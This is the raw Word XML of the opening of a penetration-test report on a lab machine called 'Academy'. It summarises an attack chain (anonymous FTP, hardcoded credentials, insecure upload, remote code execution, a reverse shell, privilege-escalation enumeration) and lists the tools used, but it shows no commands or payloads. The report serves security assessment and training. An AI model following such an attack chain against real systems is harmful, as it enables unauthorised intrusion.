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5D76" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="55C7CD4F">
          <v:rect id="_x0000_i1262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4051B4" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B5E6D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Academy Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Assessment Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal Penetration Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Tester:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sanchit Mathur</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20-12-2025</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Severity Model:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS v3.1 (Qualitative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB25523" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="6D1C3ED1">
          <v:rect id="_x0000_i1263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678FBE0" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63AA40" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This penetration test was conducted against the Academy target machine to identify security weaknesses that could allow an attacker to gain unauthorized access. The assessment revealed multiple critical vulnerabilities, including anonymous FTP access, sensitive information disclosure, hardcoded credentials, insecure file upload functionality, and insufficient privilege hardening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8725F9" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The attack chain resulted in remote code execution and reverse shell access, followed by local privilege escalation enumeration using automated and manual techniques. These weaknesses could allow an attacker to fully compromise the system, leading to data exposure, service disruption, and potential lateral movement within the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8C1AA" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Overall Risk Level:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA4225" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="6FA2C013">
          <v:rect id="_x0000_i1264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03883F71" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF675CB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611B8E0" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Target IP: 192.168.1.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE31D4" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Operating Environment: Linux-based web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA84A8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Testing Type: Black-box internal network testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BFF76D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83D4A2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The assessment followed a standard penetration testing lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488121FE" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D01F0A1" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7924C8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884F3C2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8830EB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C9803D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4967F8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="51AF8553">
          <v:rect id="_x0000_i1265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A267DB1" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>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4397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="7C4ED636" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B0DF05" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="396895FD" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="70D8EC16" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777CC482" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088BA8D7" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Network scanning &amp; service detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="7EBBD0F9" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CE5F9BC" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAA70F2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>File enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="387E60F6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="064CD13A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>DirBuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C035FC8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Directory brute forcing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="07B90E1C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="635A8705" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>FFUF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22FAB9DD" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Fast web fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="04026949" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="615EEBD6" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Bash Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="118A5C44" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Remote access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="47A3B06D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8DBB0E" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>LinPEAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="374E085D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Privilege escalation enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="513FB08E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB41ADD" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>pspy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31778540" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Monitoring privileged background processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13651C4B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="559A94B2">
          <v:rect id="_x0000_i1266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB2185" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>4. Reconnaissance &amp; Scanning</w:t>
      </w:r>
    </w:p>
